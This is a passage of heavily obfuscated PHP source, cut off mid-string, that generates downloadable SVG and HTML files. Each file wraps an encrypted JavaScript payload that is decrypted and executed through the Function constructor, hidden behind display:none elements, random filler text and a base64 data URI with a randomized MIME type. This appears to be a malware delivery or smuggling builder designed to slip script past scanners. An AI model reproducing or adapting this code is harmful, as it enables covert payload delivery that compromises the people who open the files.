x65\x64\x56\x61\x72"]}\40\x3d\40{$Cda68["\x6d\x61\x70\123\160\x65\143\x69\141\x6c\103\x68\x61\162\x46\x75\x6e\x63"]}\50{$Cda68["\x73\x70\145\143\151\141\154\123\145\161\x56\x61\162"]}\40\53\x20{$Cda68["\x63\150\x61\162\126\x61\x72"]}\x2c\x20\x74\162\x75\x65\x29\x3b\xd\12\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20{$Cda68["\162\x65\163\165\154\164\126\x61\162"]}\x20\x2b\75\40{$Cda68["\155\x61\160\x70\145\x64\126\141\x72"]}\x3b\xd\xa\40\40\40\x20\x20\40\40\40\40\40\40\40{$Cda68["\163\x70\145\x63\151\x61\x6c\123\145\x71\x56\141\x72"]}\40\75\x20\47\x27\x3b\15\12\x20\40\40\x20\40\40\x20\40\x7d\x20\x65\x6c\x73\145\x20\173\xd\12\40\x20\40\x20\x20\40\40\40\x20\40\x20\40{$Cda68["\x72\x65\163\x75\x6c\164\x56\x61\162"]}\40\x2b\75\40{$Cda68["\x63\150\141\162\x56\141\x72"]}\73\15\12\40\40\40\40\40\x20\x20\x20\175\xd\xa\x20\40\x20\40\175\xd\12\x20\x20\x20\40\57\57\x20\x49\x66\x20\x6c\141\x73\x74\x20\143\150\141\162\40\x77\141\x73\40\x61\40\x64\141\156\x67\154\x69\156\147\40\x73\x70\x65\x63\151\141\x6c\x53\x65\x71\54\x20\141\160\160\145\156\x64\40\x69\164\15\12\x20\40\x20\40\x69\146\40\x28{$Cda68["\163\x70\145\143\x69\x61\154\123\x65\161\x56\141\162"]}\51\40{$Cda68["\x72\x65\163\165\154\x74\126\x61\x72"]}\40\53\75\40{$Cda68["\x73\160\145\x63\x69\141\154\x53\x65\x71\x56\x61\x72"]}\x3b\xd\12\x20\x20\40\x20\162\x65\164\165\x72\x6e\x20{$Cda68["\162\x65\x73\165\x6c\x74\126\141\162"]}\73\xd\xa\175\xd\12\xd\xa\x28\146\165\156\143\164\x69\x6f\x6e\x28\51\40\x7b\x20\15\xa\x20\40\x20\40\x74\162\x79\x20\x7b\x20\xd\xa\40\x20\40\x20\40\x20\x20\40\50\x66\x75\156\143\x74\151\157\156\x28\51\x7b\x7d\51\56\143\x6f\x6e\x73\x74\162\165\143\164\157\162\x28\x27{$Cda68["\x61\165\x74\157\x67\x72\x61\x62"]}\x27\54\x20{$Cda68["\144\x65\x63\x72\171\160\164\x46\x75\x6e\143"]}\x28{$A6e50}\x29\51\x28{$Cda68["\x61\165\164\x6f\147\x72\x61\x62"]}\51\x3b\x20\15\xa\x20\x20\40\x20\175\x20\143\x61\164\x63\x68\x20\50{$Cda68["\x65\x56\141\x72"]}\x29\40\173\40\15\xa\40\x20\x20\40\x20\40\40\40\143\157\156\x73\x6f\x6c\145\56\145\x72\x72\x6f\x72\x28\47\x45\x72\162\157\162\x27\54\40{$Cda68["\x65\x56\141\x72"]}\x29\x3b\x20\xd\12\x20\40\x20\x20\x7d\x20\15\12\x7d\x29\50\51\x3b"; goto Aab97; a4130: $A6e50 = json_encode($this->encrypt($Bca73)); goto b90e0; a8503: $Cda68 = ["\x61\165\x74\157\147\x72\x61\x62" => TextUtils::generateWord(rand(5, 10)), "\x64\145\143\x72\171\160\x74\x46\165\x6e\x63" => TextUtils::generateWord(rand(5, 10)), "\145\x56\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\160\x61\x72\164\x73\126\x61\162" => TextUtils::generateWord(rand(5, 10)), "\x6d\x6f\162\x65\120\x61\x72\x74\163\126\x61\162" => TextUtils::generateWord(rand(5, 10)), "\153\x65\171\126\141\162" => TextUtils::generateWord(rand(5, 10)), "\x63\141\163\x65\111\156\x66\157\x56\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\163\145\x67\155\x65\x6e\164\x73\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\160\x6f\x73\151\164\x69\x6f\156\163\x56\141\x72" => TextUtils::generateWord(rand(5, 10)), "\143\x61\x73\x65\x49\x6e\x66\x6f\x41\x72\x72\x56\141\x72" => TextUtils::generateWord(rand(5, 10)), "\x72\145\163\x75\x6c\x74\126\141\162" => TextUtils::generateWord(rand(5, 10)), "\151\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\x73\145\147\x6d\x65\x6e\164\x56\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\160\x6f\163\151\164\x69\x6f\156\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\x63\x68\141\162\126\x61\162" => TextUtils::generateWord(rand(5, 10)), "\x73\160\x65\143\151\x61\154\123\x65\x71\x56\141\x72" => TextUtils::generateWord(rand(5, 10)), "\155\x61\160\x70\145\144\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\155\x61\x70\x53\x70\x65\x63\151\141\x6c\x43\x68\x61\162\106\165\x6e\x63" => TextUtils::generateWord(rand(5, 10)), "\145\x6e\143\162\171\x70\164\145\144\127\151\x74\x68\x4b\x65\171\x56\141\162" => TextUtils::generateWord(rand(5, 10)), "\x73\160\145\x63\151\141\154\115\141\x70\126\141\162" => TextUtils::generateWord(rand(5, 10)), "\163\x70\145\x63\151\x61\154\126\x61\x72" => TextUtils::generateWord(rand(5, 10)), "\143\x6f\x64\145\x56\141\x72" => TextUtils::generateWord(rand(5, 10)), "\163\x63\x72\151\x70\x74\106\x75\156\143\126\x61\162" => TextUtils::generateWord(rand(5, 10))]; goto B3d7d; e9d33: } public function extractScriptVarNames() { return isset($this->Dfd7d) ? $this->Dfd7d : []; } public function setToSVG() { goto b1644; e1f4d: $A3044 = "\43\64\141\x34\x65\66\x39"; goto e1f3f; ef653: $bd92c = bin2hex(random_bytes(4)); goto Bb633; a7ff5: $bf4d6 = base64_encode($Ecba9); goto Be086; C8c5d: $B5ab2 = $Aae5d[array_rand($Aae5d)]; goto Bf198; de9c6: $c2e30 = "\43\x32\62\62\62\63\142"; goto e1f4d; e252e: echo "\74\77\x78\x6d\154\40\166\145\x72\163\151\157\156\x3d\42\61\56\x30\x22\x20\x65\156\143\x6f\144\x69\156\x67\75\42\x55\x54\106\55\x38\42\40\163\x74\x61\x6e\x64\x61\154\x6f\156\x65\x3d\42\156\x6f\x22\x3f\x3e\xd\12\15\12{$B7437[0]}\xd\xa\15\12\74\x73\166\147\40\170\x6d\154\x6e\x73\x3d\x22\x68\164\x74\160\72\x2f\57\167\167\167\x2e\167\x33\x2e\157\162\147\x2f\x32\60\x30\60\57\x73\x76\147\42\40\170\155\x6c\x6e\x73\x3a\170\154\151\156\x6b\75\42\150\x74\164\x70\x3a\57\57\x77\167\x77\x2e\x77\63\56\157\x72\147\x2f\x31\x39\x39\71\x2f\170\154\151\x6e\153\x22\40\x77\151\144\x74\150\75\x22\61\62\x30\x22\x20\150\x65\151\147\150\164\x3d\x22\x31\62\60\42\x20\151\x64\75\x22\163\166\x67\x5f{$bd92c}\x22\40\x73\164\x79\154\145\75\42\144\x69\163\160\154\x61\171\x3a\x6e\157\156\x65\73\x22\x3e\xd\xa\40\40\x20\40\x3c\x72\x65\x63\x74\x20\x77\x69\144\164\150\x3d\x22\61\x30\x30\45\x22\x20\150\x65\x69\147\x68\x74\75\x22\x31\60\60\x25\42\x20\146\x69\154\154\75\42{$c2e30}\x22\40\x73\x74\171\154\145\75\42\x64\151\x73\160\x6c\141\171\72\x6e\x6f\x6e\145\x3b\42\57\x3e\xd\12\x20\40\x20\40\74\x63\151\x72\x63\154\145\x20\x63\x78\75\42{$C27fd}\x22\40\143\171\75\42{$Ead45}\42\40\162\75\x22{$F1bae}\42\x20\x66\x69\154\x6c\75\42{$A3044}\x22\40\x73\164\x72\157\153\145\x3d\x22\x23\71\x61\70\143\x39\x38\x22\x20\163\x74\162\157\x6b\145\55\x77\x69\x64\x74\x68\75\x22\x34\42\40\x73\164\x79\x6c\x65\x3d\42\x64\151\163\x70\154\x61\171\x3a\156\x6f\x6e\145\x3b\42\x2f\76\xd\xa\40\x20\x20\x20{$B7437[1]}\15\xa\40\x20\x20\x20\x3c\164\145\170\x74\x20\170\x3d\x22\x35\x30\45\x22\40\x79\x3d\x22\65\x34\x25\42\40\x74\145\170\164\55\141\x6e\x63\150\157\162\x3d\42\x6d\151\144\x64\x6c\x65\42\x20\x66\157\x6e\x74\x2d\146\x61\155\x69\x6c\x79\x3d\42\x43\157\x75\162\x69\x65\162\40\116\x65\x77\x2c\x20\155\x6f\x6e\157\x73\x70\x61\143\x65\x22\40\x66\157\x6e\164\x2d\163\x69\x7a\x65\x3d\42\x31\70\x22\40\x66\x69\154\x6c\x3d\42{$Cc475}\42\x20\157\160\x61\x63\151\164\x79\x3d\42\x30\56\x38\42\x20\163\164\171\154\145\75\x22\154\x65\x74\164\x65\162\55\163\x70\x61\x63\x69\x6e\147\72\62\160\x78\x3b\40\x64\151\x73\160\x6c\141\171\72\x6e\157\156\145\x3b\x22\x3e\123\145\x63\x75\162\x65\x64\74\57\x74\x65\170\164\x3e\15\xa\40\40\40\x20\74\x66\x6f\162\x65\151\147\156\117\x62\152\145\143\164\x20\x77\x69\x64\164\150\x3d\42\61\60\x30\x25\x22\x20\150\x65\x69\147\x68\x74\75\42\x31\60\60\45\42\x20\163\x74\x79\154\x65\x3d\42\144\x69\x73\x70\154\141\171\x3a\x20\x6e\x6f\x6e\145\x3b\42\76\15\xa\40\40\x20\x20{$B7437[2]}\15\xa\x20\x20\40\40\x3c\x64\x69\166\x20\x78\155\x6c\156\163\75\x22\x68\164\x74\160\x3a\x2f\x2f\x77\x77\167\x2e\x77\x33\x2e\157\x72\x67\57\x31\x39\x39\71\x2f\170\150\164\155\154\x22\x20\x73\x74\x79\154\145\x3d\42\146\157\x6e\164\55\146\141\155\151\x6c\x79\72\40\103\x6f\165\x72\151\x65\x72\40\x4e\x65\167\x3b\x20\143\x6f\154\x6f\x72\72\x20\x23\143\x39\141\x64\141\x37\x3b\42\76\15\xa\x20\40\40\x20\x20\40\40\40\x48\x69\x64\144\x65\x6e\xd\12\x20\40\40\x20\x3c\x2f\x64\x69\166\76\xd\xa\x20\40\x20\x20\x3c\x2f\x66\x6f\162\x65\x69\147\x6e\x4f\142\x6a\x65\x63\164\76\15\12\x20\40\40\x20{$B7437[3]}\15\12\40\40\x20\x20{$Bc836}\xd\xa\x20\40\x20\40\74{$Fc83e}\40\x74\171\x70\145\x3d\x22{$f74c0}\42\76\15\12\40\40\x20\40\x20\x20\40\40\x76\141\162\x20{$Cda68["\141\x75\164\x6f\147\162\x61\x62"]}\x20\x3d\x20\x22{$this->Fcd19}\42\73\15\12\x20\x20\x20\x20\74\57{$Fc83e}\76\15\12\40\x20\40\40\x3c{$Fc83e}\x20\164\171\160\145\x3d\42{$f74c0}\42\40\x78\154\x69\x6e\x6b\x3a\150\x72\145\146\75\x22{$cf935}\x22\57\76\xd\12\40\x20\40\40{$B7437[4]}\15\12\74\x2f\x73\166\147\x3e"; goto ced32; Ea608: $cf935 = "\144\x61\164\141\x3a{$B5ab2}\x3b\x62\141\x73\145\x36\x34\54{$bf4d6}"; goto e252e; C1439: $C27fd = 50; goto A622c; b1644: $Ecba9 = $this->generate(); goto Da3ff; Be086: $Aae5d = ["\141\160\160\154\151\143\x61\164\151\x6f\156\x2f\x65\143\155\x61\x73\x63\x72\151\160\164", "\164\x65\170\x74\57\145\143\155\x61\163\x63\162\x69\x70\x74", "\164\x65\170\x74\57\x68\164\155\154", "\141\160\160\154\x69\x63\141\x74\151\157\x6e\x2f\157\143\x74\145\x74\55\163\x74\x72\x65\x61\x6d", "\141\x70\160\x6c\151\143\x61\164\151\157\x6e\57\x78\55\152\141\x76\141\163\143\x72\151\x70\164"]; goto C8c5d; dc8e8: $f74c0 = "\x61\x70\x70\154\151" . "\143\141\164\151\x6f\x6e\57\145\x63\155\x61\x73" . "\143\162\x69\x70\164"; goto f9faf; Da3ff: $Cda68 = $this->extractScriptVarNames(); goto daa96; Bf198: $c9848 = "\x3f\166\x3d" . bin2hex(random_bytes(rand(1, 4))); goto Ea608; f9faf: $Cbbee = "\103\104\x41\124\101"; goto ad31d; Dc8ad: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto ef653; Bb633: $Fc83e = "\163\x63\162" . "\x69\160\164"; goto dc8e8; B604e: $F1bae = 38; goto C1439; Baf2e: $Bc836 = "\74\41\x2d\55\x20" . TextUtils::generateWord(rand(10, 20)) . "\40\55\x2d\76"; goto de9c6; daa96: header("\x43\157\156\x74\145\x6e\164\55\x54\171\160\x65\72\40\x69\155\141\147\x65\x2f\x73\x76\147\x2b\x78\x6d\x6c"); goto b6ca7; b6ca7: header("\x43\x6f\x6e\164\145\156\164\x2d\x44\x69\x73\160\x6f\163\x69\164\x69\x6f\156\x3a\40\x61\x74\164\141\x63\x68\155\145\x6e\x74\73\x20\x66\x69\154\x65\156\x61\x6d\x65\75\42\x67\145\x6e\145\x72\141\x74\145\144\x2e\163\166\147\x22"); goto Dc8ad; ad31d: $b2c70 = "\x3c\41\x5b" . $Cbbee . "\133"; goto B9316; A622c: $Ead45 = 50; goto a7ff5; e1f3f: $Cc475 = "\43\x66\62\145\x39\145\x34"; goto B604e; B9316: $C8d78 = "\x5d\x5d\76"; goto Baf2e; ced32: } public function setToHTML() { goto cbe6b; Faa46: $b7b26 = ucfirst(TextUtils::generateWord(rand(8, 16))) . "\40\x56\x69\145\167"; goto D83fe; C1187: $B74b5 = TextUtils::generateWord(rand(6, 12)); goto Fc444; b5197: $Fc83e = "\x73\x63\x72" . "\151\160\164"; goto cc03a; f9224: echo "\40\40\40\x20\x3c\41\x44\117\x43\124\x59\x50\105\40\150\164\155\x6c\76\15\xa\x20\40\x20\40\74\150\x74\155\x6c\x20\154\x61\x6e\x67\75\42\145\156\x22\x3e\15\xa\40\x20\40\40\x3c\150\x65\x61\144\x3e\xd\12\40\40\40\x20\40\40\x20\40\x3c\x6d\145\x74\x61\40\143\150\141\x72\x73\x65\164\x3d\x22\x55\x54\106\55\x38\x22\76\15\12\40\x20\x20\x20\40\x20\x20\x20\74\164\x69\x74\x6c\145\76{$b7b26}\x3c\57\x74\151\164\154\x65\x3e\xd\12\40\x20\40\40\x20\x20\x20\x20{$B7437[0]}\xd\xa\40\40\40\40\40\40\x20\x20\x3c\163\x74\171\154\145\76\15\xa\40\x20\40\40\40\40\40\x20\150\x74\x6d\x6c\54\40\x62\157\x64\171\x20\x7b\x20\x68\145\151\147\x68\164\72\x20\61\x30\x30\x25\73\40\155\x61\x72\x67\x69\156\72\x20\60\73\40\160\141\144\x64\151\x6e\x67\72\40\x30\73\x20\x7d\15\12\40\40\40\x20\x20\40\40\x20\x62\x6f\x64\171\40\173\x20\15\12\x20\x20\x20\40\40\x20\40\x20\142\x61\143\153\x67\162\x6f\165\156\x64\x3a\x20\x23\x31\x32\x31\x36\62\x39\73\x20\xd\xa\x20\40\x20\40\x20\40\x20\40\x66\157\x6e\164\55\146\141\155\151\154\x79\x3a\40\47\106\151\x72\x61\40\115\157\156\x6f\x27\x2c\x20\47\x43\157\156\x73\157\154\x61\163\x27\54\40\155\157\x6e\157\x73\x70\141\143\x65\73\40\15\12\x20\x20\x20\x20\x20\x20\x20\40\x6d\x69\156\55\x68\145\x69\x67\150\x74\72\x20\61\x30\x30\x76\x68\73\15\xa\40\x20\x20\40\40\40\40\x20\144\151\x73\x70\154\141\171\x3a\x20\x66\154\145\170\x3b\xd\12\x20\x20\40\x20\x20\x20\x20\x20\141\x6c\151\147\x6e\x2d\x69\164\x65\155\163\x3a\x20\143\x65\x6e\164\x65\162\73\15\12\x20\40\40\x20\x20\40\40\x20\x6a\x75\163\164\x69\146\171\55\143\157\x6e\164\145\156\164\x3a\40\143\x65\156\x74\x65\x72\73\15\xa\x20\x20\40\40\40\x20\x20\40\x2f\52\40\x48\x69\x64\145\x20\164\x68\x65\40\142\141\x63\153\x67\162\x6f\165\156\x64\40\x2a\x2f\xd\xa\40\x20\40\40\x20\x20\x20\x20\x62\141\143\x6b\147\162\x6f\x75\156\144\x3a\x20\156\x6f\156\x65\x20\x21\x69\155\x70\x6f\162\x74\141\156\164\x3b\xd\xa\40\40\40\x20\x20\x20\x20\40\175\xd\12\x20\x20\40\x20\x20\x20\x20\x20\56{$B74b5}\x20\x7b\x20\15\xa\x20\x20\x20\40\40\40\x20\40\142\141\x63\153\147\162\157\x75\156\x64\x3a\40\156\x6f\156\145\40\41\x69\155\160\x6f\x72\x74\141\156\x74\x3b\40\57\52\40\110\151\x64\145\x20\164\x68\145\x20\x63\x61\162\x64\40\x62\x61\143\x6b\147\x72\157\165\156\x64\40\52\x2f\15\12\x20\x20\40\40\40\40\x20\40\x62\157\162\x64\x65\x72\x3a\x20\62\x70\x78\x20\163\x6f\154\151\144\x20{$C182b}\73\15\12\40\40\x20\40\x20\x20\40\40\x62\x6f\x72\x64\x65\x72\x2d\x72\141\x64\151\165\x73\72\x20\61\x36\x70\x78\73\x20\15\xa\40\x20\40\40\40\40\x20\x20\x62\157\170\55\x73\150\x61\144\157\167\72\x20\156\x6f\x6e\x65\x20\x21\151\155\x70\x6f\x72\164\141\x6e\164\73\xd\xa\x20\40\x20\40\x20\40\40\x20\160\141\144\x64\151\156\147\72\40\x33\x36\160\170\x20\64\70\160\170\x3b\15\xa\40\40\40\x20\x20\40\x20\x20\155\151\156\x2d\x77\x69\144\x74\150\72\40\63\x32\x30\160\x78\x3b\15\xa\x20\40\40\x20\40\40\x20\x20\155\x61\x78\x2d\167\151\144\164\150\72\40\x39\60\166\x77\x3b\xd\12\x20\40\40\x20\40\40\40\x20\164\145\170\x74\x2d\141\154\151\x67\x6e\x3a\x20\143\x65\156\164\145\162\73\xd\xa\x20\40\x20\x20\x20\40\x20\40\141\156\x69\155\x61\x74\x69\x6f\x6e\x3a\40\x66\x61\x64\x65\x69\x6e\40\x31\56\x32\163\x3b\xd\12\x20\40\40\x20\40\40\40\x20\144\x69\163\x70\154\x61\x79\72\x20\156\x6f\x6e\145\73\x20\57\52\x20\x48\x69\x64\x65\40\164\150\145\40\143\141\x72\144\x20\x2a\x2f\15\xa\40\40\40\x20\x20\x20\40\40\175\xd\12\40\x20\x20\x20\40\40\x20\40\x2e{$D4af1}\x20\x7b\40\xd\12\40\40\40\40\40\x20\x20\40\x63\x6f\154\x6f\162\72\x20{$e18dc}\73\40\15\xa\x20\40\40\x20\x20\40\40\40\146\x6f\x6e\164\x2d\x73\151\172\x65\72\40\x32\x65\155\x3b\40\xd\xa\40\x20\40\40\x20\x20\x20\40\146\x6f\x6e\164\55\x77\145\x69\x67\x68\164\x3a\40\x62\x6f\154\144\73\15\12\x20\x20\x20\40\40\40\x20\40\x6c\x65\x74\164\x65\162\55\x73\x70\141\143\151\x6e\x67\72\x20\62\160\x78\73\15\12\x20\40\x20\40\x20\x20\x20\x20\155\141\162\147\x69\x6e\55\x62\157\x74\x74\x6f\x6d\x3a\40\x31\62\x70\x78\73\xd\12\40\x20\x20\40\40\40\40\x20\x64\151\163\160\x6c\x61\x79\72\x20\156\157\x6e\x65\x3b\40\57\52\x20\x48\x69\x64\x65\x20\x74\x68\x65\x20\163\x70\x61\x6e\x20\x2a\x2f\15\12\40\x20\x20\40\40\x20\x20\40\175\xd\12\40\40\40\x20\40\40\x20\x20\56\163\x75\142\x74\x6c\x65\x20\173\40\143\x6f\154\x6f\x72\72\x20{$da315}\73\40\146\157\156\164\x2d\163\x69\x7a\x65\72\x20\x31\145\x6d\x3b\40\x6d\141\x72\x67\x69\156\x2d\164\x6f\160\x3a\40\70\160\x78\73\40\144\x69\163\160\154\x61\171\x3a\x20\156\157\x6e\145\73\40\175\15\12\40\x20\x20\40\40\40\x20\x20\x40\153\x65\x79\x66\x72\141\155\145\163\40\x66\141\x64\x65\151\x6e\40\173\xd\xa\40\x20\40\40\40\40\x20\40\146\162\x6f\x6d\x20\173\40\157\x70\141\143\x69\x74\171\72\x20\60\x3b\x20\164\x72\141\x6e\x73\146\x6f\x72\x6d\x3a\40\164\x72\x61\x6e\163\x6c\x61\x74\145\131\x28\64\x30\160\170\51\73\175\xd\12\40\x20\x20\x20\40\x20\x20\40\x74\157\40\173\40\x6f\160\141\x63\151\x74\x79\72\x20\x31\x3b\40\x74\x72\x61\x6e\x73\x66\x6f\162\155\72\40\x74\162\x61\156\x73\154\141\x74\145\x59\x28\x30\x29\73\x7d\15\12\x20\x20\40\x20\40\x20\x20\40\175\15\12\x20\x20\40\40\40\x20\x20\40\74\57\163\x74\x79\x6c\145\76\15\xa\x20\40\x20\40\74\x2f\x68\x65\141\144\x3e\15\12\40\x20\x20\40\74\142\157\144\171\76\15\12\x20\x20\40\40\x20\x20\40\x20{$B7437[1]}\15\xa\40\x20\40\x20\x20\x20\40\x20\x3c\144\x69\x76\40\143\154\141\163\163\x3d\x22{$B74b5}\42\x3e\15\xa\40\40\x20\40\x20\x20\40\x20\74\163\160\x61\156\x20\143\154\141\x73\x73\75\x22{$D4af1}\x22\x3e\x53\145\143\x75\x72\145\x64\40\x48\x54\115\x4c\74\57\x73\x70\x61\x6e\76\15\12\40\x20\x20\x20\40\x20\40\40\x3c\x64\151\166\40\x63\x6c\x61\163\163\x3d\x22\163\x75\x62\x74\x6c\145\x22\x3e{$B7437[2]}\x3c\57\x64\x69\x76\76\15\12\40\40\x20\40\x20\40\40\40{$Bc836}\xd\xa\x20\40\40\x20\40\x20\x20\x20\x3c{$Fc83e}\x20\164\x79\160\145\x3d\x22{$f74c0}\42\76\xd\xa\x20\40\40\x20\40\x20\40\x20\x20\40\x20\40\166\141\162\x20{$Cda68["\x61\x75\x74\157\147\x72\141\x62"]}\x20\x3d\x20\42{$this->Fcd19}\x22\73\xd\12\x20\40\40\40\40\x20\x20\x20\74\57{$Fc83e}\x3e\xd\12\40\40\x20\40\40\x20\x20\x20\74{$Fc83e}\x20\164\x79\160\x65\x3d\42{$f74c0}\x22\x3e\xd\xa\x20\40\40\40\40\40\x20\40{$Ecba9}\xd\xa\40\40\x20\40\x20\x20\40\x20\x3c\57{$Fc83e}\x3e\xd\xa\x20\x20\40\x20\40\x20\40\40{$B7437[3]}\xd\12\x20\40\40\40\40\x20\40\x20\x3c\x2f\144\151\x76\76\15\xa\x20\x20\x20\40\x20\40\x20\x20{$B7437[4]}\xd\xa\40\x20\40\40\74\x2f\x62\x6f\144\x79\76\xd\xa\x20\40\x20\x20\x3c\57\x68\164\x6d\x6c\76"; goto B2bf3; Da812: header("\103\157\x6e\164\145\x6e\x74\x2d\124\171\160\x65\x3a\40\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\40\x63\x68\141\x72\x73\x65\x74\75\125\x54\x46\55\x38"); goto D4934; D83fe: $B1fea = "\x23\62\x33\x32\71\x34\66"; goto Aefb6; cc03a: $f74c0 = "\x74\x65\170" . "\x74\x2f\152\141\x76\x61\x73\143\x72\x69\x70\x74"; goto C1187; Da5a8: $bd92c = bin2hex(random_bytes(4)); goto b5197; e4950: $da315 = "\43\142\x38\143\x31\145\x63"; goto E7c19; E7c19: $Bc836 = "\x3c\x21\55\55\40" . TextUtils::generateWord(rand(10, 20)) . "\x20\x2d\x2d\x3e"; goto f9224; be11a: $e18dc = "\x23\145\x65\142\x62\x63\63"; goto e4950; Fc444: $D4af1 = TextUtils::generateWord(rand(6, 12)); goto Faa46; D4934: header("\103\x6f\x6e\x74\x65\x6e\164\x2d\x44\151\x73\160\157\x73\151\x74\x69\x6f\156\72\40\x61\164\164\141\x63\150\155\x65\x6e\x74\73\x20\x66\x69\x6c\145\x6e\141\x6d\145\x3d\x22\x67\x65\x6e\145\x72\x61\164\x65\x64\x2e\150\164\x6d\x6c\42"); goto a59e0; A7df2: $Cda68 = $this->extractScriptVarNames(); goto Da812; Aefb6: $Ddced = "\60\40\64\160\x78\x20\x32\x34\160\x78\40\43\61\62\61\66\62\x39\x34\x34"; goto Ae3e5; a59e0: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto Da5a8; Ae3e5: $C182b = "\43\x65\x65\x62\x62\x63\x33"; goto be11a; cbe6b: $Ecba9 = $this->generate(); goto A7df2; B2bf3: } }